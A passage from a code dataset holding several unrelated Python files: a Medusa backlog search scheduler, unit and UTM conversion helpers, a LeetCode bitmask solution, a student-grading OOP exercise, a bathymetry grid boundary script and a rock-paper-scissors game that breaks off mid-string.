Unable to start Backlog Search')\n            return\n\n        self.amActive = True\n        self.amPaused = False\n\n        if which_shows:\n            show_list = which_shows\n        else:\n            show_list = app.showList\n\n        self._get_last_backlog()\n\n        cur_date = datetime.date.today().toordinal()\n        from_date = datetime.date.fromordinal(1)\n\n        if not which_shows and self.forced:\n            log.info(u'Running limited backlog search on missed episodes from last {0} days',\n                     app.BACKLOG_DAYS)\n            from_date = datetime.date.today() - datetime.timedelta(days=app.BACKLOG_DAYS)\n        else:\n            log.info(u'Running full backlog search on missed episodes for selected shows')\n\n        # go through non air-by-date shows and see if they need any episodes\n        for series_obj in show_list:\n\n            if series_obj.paused:\n                continue\n\n            segments = series_obj.get_wanted_segments(from_date=from_date)\n\n            for season, segment in iteritems(segments):\n                self.currentSearchInfo = {'title': '{series_name} Season {season}'.format(series_name=series_obj.name,\n                                                                                          season=season)}\n\n                backlog_queue_item = BacklogQueueItem(series_obj, segment)\n                app.search_queue_scheduler.action.add_item(backlog_queue_item)  # @UndefinedVariable\n\n            if not segments:\n                log.debug(u'Nothing needs to be downloaded for {0!r}, skipping', series_obj.name)\n\n        # don't consider this an actual backlog search if we only did recent eps\n        # or if we only did certain shows\n        if from_date == datetime.date.fromordinal(1) and not which_shows:\n            self._set_last_backlog(cur_date)\n\n        self.amActive = False\n        self._reset_pi()\n\n    def _get_last_backlog(self):\n        \"\"\"Get the last time the backlog ran.\"\"\"\n        log.debug(u'Retrieving the last check time from the DB')\n\n        main_db_con = db.DBConnection()\n        sql_results = main_db_con.select('SELECT last_backlog '\n                                         'FROM info')\n\n        if not sql_results:\n            last_backlog = 1\n        elif sql_results[0]['last_backlog'] is None or sql_results[0]['last_backlog'] == '':\n            last_backlog = 1\n        else:\n            last_backlog = int(sql_results[0]['last_backlog'])\n            if last_backlog > datetime.date.today().toordinal():\n                last_backlog = 1\n\n        self._last_backlog = last_backlog\n        return self._last_backlog\n\n    @staticmethod\n    def _set_last_backlog(when):\n        \"\"\"Set the last backlog in the DB.\"\"\"\n        log.debug(u'Setting the last backlog in the DB to {0}', when)\n\n        main_db_con = db.DBConnection()\n        sql_results = main_db_con.select('SELECT last_backlog '\n                                         'FROM info')\n\n        if not sql_results:\n            main_db_con.action('INSERT INTO info (last_backlog, last_indexer) '\n                               'VALUES (?,?)', [str(when), 0])\n        else:\n            main_db_con.action('UPDATE info '\n                               'SET last_backlog={0}'.format(when))\n\n    def run(self, force=False):\n        \"\"\"Run the backlog.\"\"\"\n        try:\n            if force:\n                self.forced = True\n\n            # Push an update to any open Web UIs through the WebSocket\n            ws.Message('QueueItemUpdate', self._to_json).push()\n            self.search_backlog()\n            ws.Message('QueueItemUpdate', self._to_json).push()\n\n        except Exception:\n            self.amActive = False\n            raise\n","repo_name":"pymedusa/Medusa","sub_path":"medusa/search/backlog.py","file_name":"backlog.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","stars":1665,"dataset":"github-code","pt":"22"} +{"seq_id":"35187287754","text":"a = int(input())\nsq = a * a\nsu = 0\nwhile sq > 0:\n    r = sq % 10\n    su = su + r\n    sq = sq // 10\nif su == a:\n    print(\"Neon Number\")\nelse:\n    print(\"Not Neon 
Number\")\n","repo_name":"soumyalr/codemind-python","sub_path":"Neon_Number.py","file_name":"Neon_Number.py","file_ext":"py","file_size_in_byte":147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"10216025833","text":"from __future__ import division, unicode_literals\n\n__version__ = '$Revision: 1 $'\n# $Source$\n\nfrom numpy import (arcsin, arctan, asarray, cos, cosh, meshgrid, ndarray,\n polyval, sin, sinh, tan, tanh)\nfrom numpy import ma\n\n__all__ = ['fromAtoB']\n\n\ndef fromAtoB(data_in, A, B, vtype=None):\n \"\"\"\n Converts from input data from unit A to unit B.\n\n Parameters\n ----------\n data_in : float, array like\n Input data to be converted.\n A : string\n Input data unit.\n B : string\n Desired output data unit.\n vtype : string, optional\n Determines the type of the variable. If type is `stdev`, no\n offset is applied, only scaling.\n\n Returns\n -------\n data_out : float, array like\n Converted data.\n\n \"\"\"\n #\n #\n if A == B:\n return data_in\n elif (A == 'degC') & (B == 'K'):\n p = [1, 273.15]\n elif (A == 'K') & (B == 'degC'):\n p = [1, -273.15]\n elif (A == 'mbar') & (B == 'Pa'):\n p = [1e2, 0]\n elif (A == 'Pa') & (B == 'mbar'):\n p = [1e-2, 0]\n elif (A == 'hPa') & (B == 'Pa'):\n p = [1e2, 0]\n elif (A == 'Pa') & (B == 'hPa'):\n p = [1e-2, 0]\n elif (A in ['%', '1e-2']) & (B == '1'):\n p = [1e-2, 0]\n elif (A == '1') & (B in ['%', '1e-2']):\n p = [1e2, 0]\n elif (A == '1e-3') & (B == '1'):\n p = [1e-3, 0]\n elif (A == '1') & (B == '1e-3'):\n p = [1e3, 0]\n elif (A == 'ppm') & (B == '1'):\n p = [1e-6, 0]\n elif (A == '1') & (B == 'ppm'):\n p = [1e6, 0]\n elif (A == 'km h-1') & (B == 'm s-1'):\n p = [1./3.6, 0]\n elif (A == 'm s-1') & (B == 'km h-1'):\n p = [3.6, 0]\n elif (A == 'mm h-1') & (B == 'm s-1'):\n p = [1./3.6 * 1e-6, 0]\n elif (A == 'm s-1') & (B == 'mm h-1'):\n p = [3.6 * 1e6, 0]\n elif (A == 'm s-1') & (B == 'knot'):\n p = [1.9438444924574, 0]\n elif (A == 'knot') & (B == 'm s-1'):\n p = [0.51444444444, 0]\n elif (A in [u'µmol m-2 s-1', 'µmol m-2 s-1', 'µmol m-2 s-1']) & (B == 'mol m-2 s-1'):\n p = [1e-6, 0]\n elif (A == 'mol m-2 s-1') & (B == u'µmol m-2 s-1'):\n p = [1e6, 0]\n elif (A in [u'µg l-1', 'µg l-1', 'µg l-1']) & (B == 'kg m-3'):\n p = [1e-6, 0]\n elif (A == 'kg m-3') & (B == u'µg l-1'):\n p = [1e6, 0]\n elif (A == 'mg l-1') & (B == 'kg m-3'):\n p = [1e-3, 0]\n elif (A == 'kg m-3') & (B == 'mg l-1'):\n p = [1e3, 0]\n elif (A == 'mg m-3') & (B == 'kg m-3'):\n p = [1e-6, 0]\n elif (A == 'kg m-3') & (B == 'mg m-3'):\n p = [1e6, 0]\n elif (A == u'µmol m-3') & (B == 'mol m-3'):\n p = [1e-6, 0]\n elif (A == 'mol m-3') & (B == u'µmol m-3'):\n p = [1e6, 0]\n elif (A == u'µmol l-1') & (B == 'mol m-3'):\n p = [1e-9, 0]\n elif (A == 'mol m-3') & (B == u'µmol l-1'):\n p = [1e9, 0]\n # The following conversions are experimental!!!\n elif (A == 'rfu') & (B == '1'):\n p = [1, 0]\n elif (A == 'ppb') & (B == '1'):\n p = [1, 0]\n #elif (A == '') & (B == ''):\n else:\n raise ValueError('Unable to convert from `{}` to `{}`.'.format(A, B))\n #\n if vtype == 'stdev':\n p[1] = 0\n #\n if isinstance(data_in, ma.MaskedArray):\n return ma.array(polyval(p, data_in.data), mask=data_in.mask)\n else:\n return polyval(p, data_in)\n\n\ndef fromUTMtoLonLat(E, N, zone, hemisphere=1, datum='WGS84'):\n \"\"\"\n Converts geographical units from Universal Transverse Mercator (UTM)\n conformal projection to longitude and latitude.\n\n Parameters\n ----------\n E, N : float, array like\n Easting and northing 
geographic Cartesian coordinates in meters.\n    zone : integer\n    hemisphere : char, integer, optional\n        Either `N` or `+1` for northern hemisphere or `S` or `-1` for\n        southern hemisphere.\n    datum: string, optional\n\n    Returns\n    -------\n    lon, lat : float, array like\n        Longitude and latitude equivalent to UTM coordinates.\n    k : float, array like\n    gamma : float, array like\n\n    References\n    ----------\n    .. [1] Universal Transverse Mercator coordinate system. Available at\n        https://en.wikipedia.org/wiki/\n        Universal_Transverse_Mercator_coordinate_system\n\n    \"\"\"\n    # Checks for easting and northing parameter data type. If they are arrays\n    # we have to create a meshgrid to perform all the calculations.\n    if (isinstance(E, (ndarray, list, tuple)) |\n            isinstance(N, (ndarray, list, tuple))):\n        E, N = meshgrid(asarray(E), asarray(N))\n    # Converts easting and northing parameters to kilometers.\n    E, N = E * 1e-3, N * 1e-3\n\n    # Constants and parameters\n    a = 6378.137  # Equatorial radius of the earth in km.\n    if hemisphere in ['N', 'n', 1]:\n        N0 = 0\n        hemisphere = 1.\n    elif hemisphere in ['S', 's', -1]:\n        N0 = 10000  # Wikipedia assumes km.\n        hemisphere = -1.\n    k0 = 0.9996\n    E0 = 500  # Again, Wikipedia assumes km.\n    f = 1. / 298.257223563  # WGS84 inverse flattening.\n\n    # Some calculated parameters\n    n = f / (2 - f)\n    A = a / (1 + n) * (1 + n**2/4 + n**4 / 64)\n    beta = [1./2*n - 2./3*n**2 + 37./96*n**3, 1./48*n**2 + 1./15*n**3,\n            17./480*n**3]\n    delta = [2*n - 2./3*n**2 - 2*n**3, 7./3*n**2 - 8./5*n**3, 56./15*n**3]\n\n    # Simple lambda functions\n    beta_sincosh = lambda j, epsilon, eta: beta[j-1] * sin(2*j*epsilon) * cosh(2*j*eta)\n    beta_cossinh = lambda j, epsilon, eta: beta[j-1] * cos(2*j*epsilon) * sinh(2*j*eta)\n    beta_coscosh = lambda j, epsilon, eta: 2 * j * beta[j-1] * cos(2*j*epsilon) * cosh(2*j*eta)\n    beta_sinsinh = lambda j, epsilon, eta: 2 * j * beta[j-1] * sin(2*j*epsilon) * sinh(2*j*eta)\n\n    # Intermediate values\n    epsilon = (N - N0) / (k0 * A)\n    eta = (E - E0) / (k0 * A)\n    epsilon_ = epsilon - (beta_sincosh(1, epsilon, eta) + beta_sincosh(2, epsilon, eta) + beta_sincosh(3, epsilon, eta))\n    eta_ = eta - (beta_cossinh(1, epsilon, eta) + beta_cossinh(2, epsilon, eta) + beta_cossinh(3, epsilon, eta))\n    sigma_ = 1 - (beta_coscosh(1, epsilon, eta) + beta_coscosh(2, epsilon, eta) + beta_coscosh(3, epsilon, eta))\n    tau_ = (beta_sinsinh(1, epsilon, eta) + beta_sinsinh(2, epsilon, eta) + beta_sinsinh(3, epsilon, eta))\n    chi = arcsin(sin(epsilon_) / cosh(eta_))\n\n    # Finally\n    phi = chi + (delta[0] * sin(2*1*chi) + delta[1] * sin(2*2*chi) +\n                 delta[2] * sin(2*3*chi))  # Latitude\n    lambda0 = zone * 6. - 183.  # Longitude of reference meridian\n    lambda_ = lambda0 + arctan(sinh(eta_) / cos(epsilon_))\n    k = k0 * A / a * ((1 + ((1 - n)/(1 + n) * tan(phi))**2) * (((cos(epsilon_))**2 + (sinh(eta_))**2) / (sigma_**2 + tau_**2)))**0.5\n    gamma = hemisphere * arctan((tau_ + sigma_ * tan(epsilon_) * tanh(eta_)) / (sigma_ - tau_ * tan(epsilon_) * tanh(eta_)))\n    #\n    return lambda_, phi, k, gamma\n","repo_name":"regeirk/atlantis","sub_path":"units/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"24354542265","text":"# 1239. Maximum Length of a Concatenated String with Unique Characters\n# Given an array of strings arr. 
String s is a concatenation of a sub-sequence of arr which have unique characters.\n#\n# Return the maximum possible length of s.\n#\n# Example 1:\n#\n# Input: arr = [\"un\",\"iq\",\"ue\"]\n# Output: 4\n# Explanation: All possible concatenations are \"\",\"un\",\"iq\",\"ue\",\"uniq\" and \"ique\".\n# Maximum length is 4.\n#\n# Example 2:\n#\n# Input: arr = [\"cha\",\"r\",\"act\",\"ers\"]\n# Output: 6\n# Explanation: Possible solutions are \"chaers\" and \"acters\".\n#\n# Example 3:\n#\n# Input: arr = [\"abcdefghijklmnopqrstuvwxyz\"]\n# Output: 26\n\nfrom typing import List\n\n# Backtracking (recursion) + bit manipulation\n\nclass Solution:\n    def maxLength(self, arr: List[str]) -> int:\n        masks = list()\n        for s in arr:\n            mask = 0\n            for ch in s:\n                idx = ord(ch) - ord(\"a\")\n                if ((mask >> idx) & 1):  # if mask already contains ch, s has a duplicate letter and cannot be used\n                    mask = 0\n                    break\n                mask |= 1 << idx  # add ch to mask\n            if mask > 0:\n                masks.append(mask)\n\n        ans = 0\n\n        def backtrack(pos: int, mask: int) -> None:\n            if pos == len(masks):\n                nonlocal ans\n                ans = max(ans, bin(mask).count(\"1\"))\n                return\n\n            if (mask & masks[pos]) == 0:  # mask and masks[pos] share no letters\n                backtrack(pos + 1, mask | masks[pos])\n            backtrack(pos + 1, mask)\n\n        backtrack(0, 0)\n        return ans\n\n# Iteration + bit manipulation\n\nclass Solution:\n    def maxLength(self, arr: List[str]) -> int:\n        ans = 0\n        masks = [0]\n        for s in arr:\n            mask = 0\n            for ch in s:\n                idx = ord(ch) - ord(\"a\")\n                if ((mask >> idx) & 1):  # if mask already contains ch, s has a duplicate letter and cannot be used\n                    mask = 0\n                    break\n                mask |= 1 << idx  # add ch to mask\n            if mask == 0:\n                continue\n\n            n = len(masks)\n            for i in range(n):\n                m = masks[i]\n                if (m & mask) == 0:  # m and mask share no letters\n                    masks.append(m | mask)\n                    ans = max(ans, bin(m | mask).count(\"1\"))\n\n        return ans\n","repo_name":"Dis-count/ProgrammingPractice","sub_path":"153.py","file_name":"153.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32934923855","text":"from typing import List\n\n\ndef get_average_grades(all_grades: dict[str: List[int]]) -> int:\n    result = []\n    for key, value in all_grades.items():\n        result.append(sum(value) / len(value))\n    average_grades = sum(result) / len(result)\n    return average_grades\n\n\nclass Student:\n    def __init__(self, name, surname, gender):\n        self.name = name\n        self.surname = surname\n        self.gender = gender\n        self.finished_courses = []\n        self.courses_in_progress = []\n        self.grades = {}\n\n    def rate_lecturer(self, lecturer, course, grade):\n        if isinstance(lecturer, Lecturer) and course in self.courses_in_progress \\\n                and course in lecturer.courses_attached:\n            if course in lecturer.grades:\n                lecturer.grades[course] += [grade]\n            else:\n                lecturer.grades[course] = [grade]\n        else:\n            return 'Ошибка'\n\n    def __gt__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        average_grades_other = get_average_grades(other.grades)\n\n        if isinstance(other, Student):\n            if average_grades_self > average_grades_other:\n                return f'Cредние оценки студента {self.name} больше, чем студента {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __lt__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        average_grades_other = get_average_grades(other.grades)\n        if isinstance(other, Student):\n            if average_grades_self < average_grades_other:\n                return f'Cредние оценки студента {self.name} меньше, чем студента {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __eq__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        
average_grades_other = get_average_grades(other.grades)\n        if isinstance(other, Student):\n            if average_grades_self == average_grades_other:\n                return f'Cредние оценки студента {self.name} равны оценкам студента {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __str__(self):\n        average_grades = get_average_grades(self.grades)\n        # result = []\n        # for key, value in self.grades.items():\n        #     result.append(sum(value)/len(value))\n        # average_grades = sum(result)/len(result)\n        return f'Имя: {self.name}\\n' \\\n               f'Фамилия: {self.surname}\\n' \\\n               f'Средняя оценка за домашние задания: {round(average_grades, 2)}\\n' \\\n               f'Курсы в процессе изучения: {\", \".join(self.courses_in_progress)}\\n' \\\n               f'Завершенные курсы: {\", \".join(self.finished_courses)}'\n\n\nclass Mentor:\n    def __init__(self, name, surname):\n        self.name = name\n        self.surname = surname\n        self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n    def __init__(self, name, surname):\n        super().__init__(name, surname)\n        self.grades = {}\n\n    def __gt__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        average_grades_other = get_average_grades(other.grades)\n\n        if isinstance(other, Lecturer):\n            if average_grades_self > average_grades_other:\n                return f'Cредние оценки лектора {self.name} больше, чем лектора {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __lt__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        average_grades_other = get_average_grades(other.grades)\n        if isinstance(other, Lecturer):\n            if average_grades_self < average_grades_other:\n                return f'Cредние оценки лектора {self.name} меньше, чем лектора {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __eq__(self, other):\n        average_grades_self = get_average_grades(self.grades)\n        average_grades_other = get_average_grades(other.grades)\n        if isinstance(other, Lecturer):\n            if average_grades_self == average_grades_other:\n                return f'Cредние оценки лектора {self.name} равны оценкам лектора {other.name}'\n        else:\n            return f'Типы сравниваемых объектов отличаются!'\n\n    def __str__(self):\n        average_grades = get_average_grades(self.grades)\n        # result = []\n        # for key, value in self.grades.items():\n        #     result.append(sum(value)/len(value))\n        # average_grades = sum(result)/len(result)\n        return f'Имя: {self.name}\\n' \\\n               f'Фамилия: {self.surname}\\n' \\\n               f'Средняя оценка за лекции: {round(average_grades, 2)}\\n'\n\n\nclass Reviewer(Mentor):\n    def __init__(self, name, surname):\n        super().__init__(name, surname)\n\n    def rate_hw(self, student, course, grade):\n        if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n            if course in student.grades:\n                student.grades[course] += [grade]\n            else:\n                student.grades[course] = [grade]\n        else:\n            return 'Ошибка'\n\n    def __str__(self):\n        return f'Имя: {self.name}\\nФамилия: {self.surname}\\n'\n\n\nbest_student = Student('Ruoy', 'Eman', 'your_gender')\nbest_student.courses_in_progress += ['Python']\nbest_student.courses_in_progress += ['Git']\nbest_student.finished_courses += ['Введение в программирование']\n\ncool_student = Student('Molly', 'Gwins', 'your_gender')\ncool_student.courses_in_progress += ['Git']\ncool_student.courses_in_progress += ['Python']\ncool_student.courses_in_progress += ['Django']\ncool_student.finished_courses += ['Введение в программирование']\n\nfirst_reviewer = Reviewer('Some', 'Buddy')\nfirst_reviewer.courses_attached += 
['Python']\nfirst_reviewer.courses_attached += ['Git']\n\nsecond_reviewer = Reviewer('Karl', 'Stone')\nsecond_reviewer.courses_attached += ['Git']\nsecond_reviewer.courses_attached += ['Django']\n\nfirst_lecturer = Lecturer('Spam', 'Eggs')\nfirst_lecturer.courses_attached += ['Python']\nfirst_lecturer.courses_attached += ['Git']\n\nsecond_lecturer = Lecturer('Lama', 'Alabama')\nsecond_lecturer.courses_attached += ['Django']\nsecond_lecturer.courses_attached += ['Python']\n\nfirst_reviewer.rate_hw(best_student, 'Python', 10)\nfirst_reviewer.rate_hw(best_student, 'Git', 9)\nfirst_reviewer.rate_hw(cool_student, 'Python', 10)\n\nsecond_reviewer.rate_hw(best_student, 'Django', 8)\nsecond_reviewer.rate_hw(cool_student, 'Git', 10)\nsecond_reviewer.rate_hw(cool_student, 'Django', 7)\n\nbest_student.rate_lecturer(first_lecturer, 'Python', 10)\ncool_student.rate_lecturer(first_lecturer, 'Git', 8)\n# print(best_student.grades)\n# print(cool_student.grades)\nprint(first_lecturer.grades)\nprint(second_lecturer.grades)\n\n\n# print(first_reviewer)\n# print(first_lecturer)\n# print(best_student)\n# print(cool_student)\n\n\ndef get_average_students_grade_course(students_list: List[Student], course: str):\n    result = []\n    for student in students_list:\n        if course in student.grades:\n            for grade in student.grades[course]:\n                result.append(grade)\n\n    average_course_grade = sum(result) / len(result)\n    return f'Средняя оценка студентов по курсу {course} составляет {average_course_grade}'\n\n\ndef get_average_lecturers_grade_course(lecturers_list: List[Lecturer], course: str):\n    result = []\n    for lecturer in lecturers_list:\n        if course in lecturer.grades:\n            for grade in lecturer.grades[course]:\n                result.append(grade)\n\n    average_course_grade = sum(result) / len(result)\n    return f'Средняя оценка лекторов по курсу {course} составляет {average_course_grade}'\n\n\nprint(get_average_students_grade_course([best_student, cool_student], 'Git'))\nprint(get_average_lecturers_grade_course([first_lecturer, second_lecturer], 'Git'))\n","repo_name":"Zeilanda/Netology-OOP","sub_path":"students_and_mentors.py","file_name":"students_and_mentors.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22881213030","text":"\r\nclass computer: # defines a class\r\n    def config(self): # defines a method (a function inside a class)\r\n        print(\"16gb RAM,550gb SSD,i9 core Processor\")\r\n\r\n\r\ncomp1 = computer() # create an object from the class\r\ncomp2 = computer()\r\n\r\n# computer.config(comp1) # calling config and passing comp1\r\n# computer.config(comp2)\r\n\r\ncomp1.config() # config receives comp1 as the self parameter\r\ncomp2.config()\r\n\r\n\r\n","repo_name":"HudaitRITAM/python_Basic","sub_path":"class_object_1.py","file_name":"class_object_1.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"32654227821","text":"games = [\"Monopoly\",\"Trivial Pursuit\",\"Chess\",\"Poker\"]\nprint(\"I like the games: \" + str(games))\n\nwantsToAdd = True\nwhile (wantsToAdd):\n    new_game = input(\"Do you want to add a new game? \")\n    if (\"es\" in new_game):\n        games.append(new_game)\n    else:\n        wantsToAdd = False\n\n\"\"\"\nnew_game = input(\"What game do you like to play? 
\")\ngames.append(new_game)\nprint(\"Games we like: \" + str(games))\n\"\"\"","repo_name":"ChDonnelly/ATCS-2021","sub_path":"project0/manyGames.py","file_name":"manyGames.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70835675575","text":"# Chap 8.1 - Modules\n# Modules in Python\n# 3. Namespaces\n\n# Nice, this explains about aliasing (similar to Bash i guess). In Python aliasing is \"as\"\n# import module_name as name_you_pick_for_the_module\n\n# Tasks\n# 1. Below import codecademylib3_seaborn, import pyplot from the module matplotlib with alias plt\n# 2. Import random below the other import statements. It's best to keep all imports at the top of your file.\n# 3. Create a variable numbers_a and set it equal to the range of numbers 1 through 12 (inclusive)\n# 4. Create a variable numbers_b and set it equal to a random sample of twelve numbers within range(1000)\n# 5. Now let's plot these number sets against each other using plt. Call plt.plot() with your two variables\n# as it's arbuments\n# 6. Now call plt.show() and run your code!\n\nfrom matplotlib import pyplot as plt\nimport random\n\nnumbers_a = range(1, 13)\nnumbers_b = random.sample(range(1000), 12)\nprint(numbers_b)\n\nplt.plot(numbers_a, numbers_b)\nplt.show()\n\n# Cool, first thing outside terminal :D\n\n\n","repo_name":"DiggsAsura/study","sub_path":"archive/codecademy/Python3/8.1_Modules_3-Namepaces.py","file_name":"8.1_Modules_3-Namepaces.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6514723189","text":"#!/usr/bin/env python3\n\nfrom pycascadia.loaders import load_source\nfrom pygmt import grdcut\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef clip_to_value(arr, test_arr=None, value=0.0):\n if test_arr is None:\n test_arr = arr\n\n arr[test_arr > value] = value\n\n\ndef main():\n # Handle arguments\n parser = argparse.ArgumentParser(\n description=\"Add piecewise halo surrounding given netcdf file\"\n )\n parser.add_argument(\"--input\", required=True, help=\"input file\")\n parser.add_argument(\"--output\", required=True, help=\"output file\")\n parser.add_argument(\n \"--value\", type=float, default=0.0, help=\"value to replace boundary with\"\n )\n parser.add_argument(\n \"--offset\",\n action=\"store_true\",\n default=False,\n help=\"use one index from true boundary as boundary\",\n )\n parser.add_argument(\n \"--plot\",\n action=\"store_true\",\n default=False,\n help=\"plot final grid before saving\",\n )\n parser.add_argument(\n \"--region\",\n required=False,\n metavar=(\"xmin\", \"xmax\", \"ymin\", \"ymax\"),\n nargs=4,\n type=float,\n help=\"output region. 
Defaults to the extent of the input grid.\",\n )\n args = parser.parse_args()\n\n in_fname = args.input\n input_grid, _, _ = load_source(in_fname, plot=False)\n\n if args.region:\n input_grid = grdcut(input_grid, region=args.region)\n\n if args.offset:\n clip_to_value(input_grid[0, :], input_grid[1, :], value=args.value)\n clip_to_value(input_grid[-1, :], input_grid[-2, :], value=args.value)\n clip_to_value(input_grid[:, 0], input_grid[:, 1], value=args.value)\n clip_to_value(input_grid[:, -1], input_grid[:, -2], value=args.value)\n else:\n clip_to_value(input_grid[0, :], value=args.value)\n clip_to_value(input_grid[-1, :], value=args.value)\n clip_to_value(input_grid[:, 0], value=args.value)\n clip_to_value(input_grid[:, -1], value=args.value)\n\n if args.plot:\n # Plot bath & contour on top\n input_grid.plot()\n plt.contour(\n input_grid.x,\n input_grid.y,\n input_grid.values,\n levels=[args.value],\n colors=[\"green\"],\n )\n\n # Increase view of region to display closed contours\n BORDER_SCALE = 0.1\n x_diff = input_grid.x[-1] - input_grid.x[0]\n y_diff = input_grid.y[-1] - input_grid.y[0]\n plt.xlim(\n input_grid.x[0] - BORDER_SCALE * x_diff,\n input_grid.x[-1] + BORDER_SCALE * x_diff,\n )\n plt.ylim(\n input_grid.y[0] - BORDER_SCALE * y_diff,\n input_grid.y[-1] + BORDER_SCALE * y_diff,\n )\n\n plt.show()\n\n input_grid.to_netcdf(args.output)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UCL/pyCascadia","sub_path":"scripts/close_boundary.py","file_name":"close_boundary.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"7863862930","text":"\"\"\"A program that plays the game of Rock, Paper, Scissors.\n\nUsage: rps.py\n\nAttributes:\n MOVES: A list of strs representing possible moves (default: \"rock\",\n \"paper\", and \"scissors\")\n\nClasses:\n Player()\n RandomPlayer()\n HumanPlayer()\n ReflectPlayer()\n CyclePlayer()\n Game()\n\"\"\"\n\nimport random\n\nMOVES = [\"rock\", \"paper\", \"scissors\"]\n\n\nclass Player:\n \"\"\"Creates a player that always plays 'rock'.\"\"\"\n\n @staticmethod\n def move():\n \"\"\"Returns the move 'rock'.\n\n Returns:\n rock: A str representing the move rock\n \"\"\"\n return \"rock\"\n\n def learn(self, my_move, their_move):\n \"\"\"Placeholder for child classes.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n\n\nclass RandomPlayer(Player):\n \"\"\"Creates a player that plays a random move from the MOVES array.\"\"\"\n\n def move(self):\n \"\"\"Returns a random move from the MOVES array.\n\n Returns:\n A str representing a move from the MOVES array\n \"\"\"\n return random.choice(MOVES)\n\n\nclass HumanPlayer(Player):\n \"\"\"Creates a player that is human controllable.\"\"\"\n\n def move(self):\n \"\"\"Returns a move of the human player's choosing.\n\n Returns:\n move: A str representing a move from the MOVES array chosen by the\n human player\n \"\"\"\n while True:\n move = input(\"Rock, paper, scissors? 
> \").lower()\n if move in MOVES:\n return move\n\n\nclass ReflectPlayer(Player):\n \"\"\"Creates a player that plays based on the opponent's previous move.\n\n Attributes:\n next_move: A str representing the player's next move\n \"\"\"\n\n def __init__(self):\n \"\"\"Reflect Player set-up.\"\"\"\n self.next_move = random.choice(MOVES)\n\n def move(self):\n \"\"\"Returns the player's next move.\n\n Returns:\n self.next_move: A str presenting the players next move\n \"\"\"\n return self.next_move\n\n def learn(self, my_move, their_move):\n \"\"\"Sets the player's next move to their opponent's previous move.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n self.next_move = their_move\n\n\nclass CyclePlayer(Player):\n \"\"\"Creates a player that plays 'rock', 'paper', 'scissors', in that order.\n\n Attributes:\n next_move: A str representing the player's next move\n \"\"\"\n\n def __init__(self):\n \"\"\"Cycle Player set-up.\"\"\"\n self.next_move = \"rock\"\n\n def move(self):\n \"\"\"Returns the player's next move.\n\n Returns:\n self.next_move: A str presenting the players next move\n \"\"\"\n return self.next_move\n\n def learn(self, my_move, their_move):\n \"\"\"Sets the player's next move to the next move in the MOVES array.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n my_move_index = MOVES.index(my_move)\n next_move_index = (my_move_index + 1) % 3\n self.next_move = MOVES[next_move_index]\n\n\ndef beats(one, two):\n \"\"\"Returns a bool representing if the first arg is the winner.\n\n Args:\n one: A str representing a player's move\n two: A str representing a player's move\n\n Returns:\n A bool that is True if one is the winner\n \"\"\"\n return (\n (one == \"rock\" and two == \"scissors\")\n or (one == \"scissors\" and two == \"paper\")\n or (one == \"paper\" and two == \"rock\")\n )\n\n\nclass Game:\n \"\"\"Creates a game or rock, paper, scissors played between two players.\n\n Attributes:\n player1: A Player class representing player 1\n player2: A Player class representing player 2\n score1: An int representing player 1's score\n score2: An int representing player 2's score\n \"\"\"\n\n def __init__(self, player1, player2):\n \"\"\"Game set-up.\"\"\"\n self.player1 = player1\n self.player2 = player2\n self.score1 = 0\n self.score2 = 0\n\n def play_round(self):\n \"\"\"Plays a round of rock, paper Scissors.\n\n Collects the moves of both players, determines a winner, and then\n displays and updates the score\n \"\"\"\n move1 = self.player1.move()\n move2 = self.player2.move()\n print(f\"Player 1: {move1} Player 2: {move2}\")\n\n if beats(move1, move2):\n self.score1 += 1\n print(\"** PLAYER ONE WINS **\")\n elif beats(move2, move1):\n self.score2 += 1\n print(\"** PLAYER TWO WINS **\")\n else:\n print(\"** TIE **\")\n\n print(f\"Score: Player One {self.score1}, Player Two {self.score2}\\n\")\n self.player1.learn(move1, move2)\n self.player2.learn(move2, move1)\n\n def play_game(self):\n \"\"\"Plays a 3-round game of rock, paper, scissors.\n\n Plays three rounds of rock, paper scissors, and in the event of a tie\n score, continues to play extra rounds until there is a winner, and then\n displays the final score\n \"\"\"\n print(\"\\nGame start!\\n\")\n\n for rnd in range(3):\n print(f\"Round {rnd} of 3:\")\n self.play_round()\n\n while self.score1 == self.score2:\n print(\"Game cannot 
